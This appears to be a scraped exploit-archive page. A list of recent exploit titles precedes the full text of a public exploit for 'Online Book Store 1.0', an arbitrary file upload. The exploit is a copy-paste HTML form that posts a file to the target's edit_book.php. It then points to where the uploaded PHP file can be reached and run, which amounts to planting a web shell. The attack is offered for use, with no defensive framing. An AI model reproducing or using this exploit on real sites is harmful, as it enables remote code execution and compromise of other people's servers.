
12 changes to exploits/shellcodes SunOS 5.10 Generic_147148-26 - Local Privilege Escalation Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP) Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting VICIDIAL Call Center Suite - Multiple SQL Injections Online Book Store 1.0 - 'bookisbn' SQL Injection WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting Online Book Store 1.0 - Arbitrary File Upload Tautulli 2.1.9 - Denial of Service ( Metasploit ) Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
22 lines
No EOL
1.1 KiB
Text
22 lines
No EOL
1.1 KiB
Text
# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload
|
|
# Google Dork: N/A
|
|
# Date: 2020-01-16
|
|
# Exploit Author: Or4nG.M4n aka S4udiExploit
|
|
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
|
|
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
|
|
# Version: 1.0
|
|
# Tested on: MY MIND v1.23.45
|
|
# CVE: N/A
|
|
# WWW . SEC4EVER . COM
|
|
-> hola amigos ^.^
|
|
-> just copy this html code
|
|
<form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
|
|
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
|
|
<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
|
|
<td><input type="file" name="image"></td>
|
|
<input type="submit" name="save_change" value="Change" class="btn btn-primary">
|
|
</form>
|
|
-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
|
|
# i think am back %^_^%
|
|
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
|
|
# big thanks to Stupid Coder ^.^ |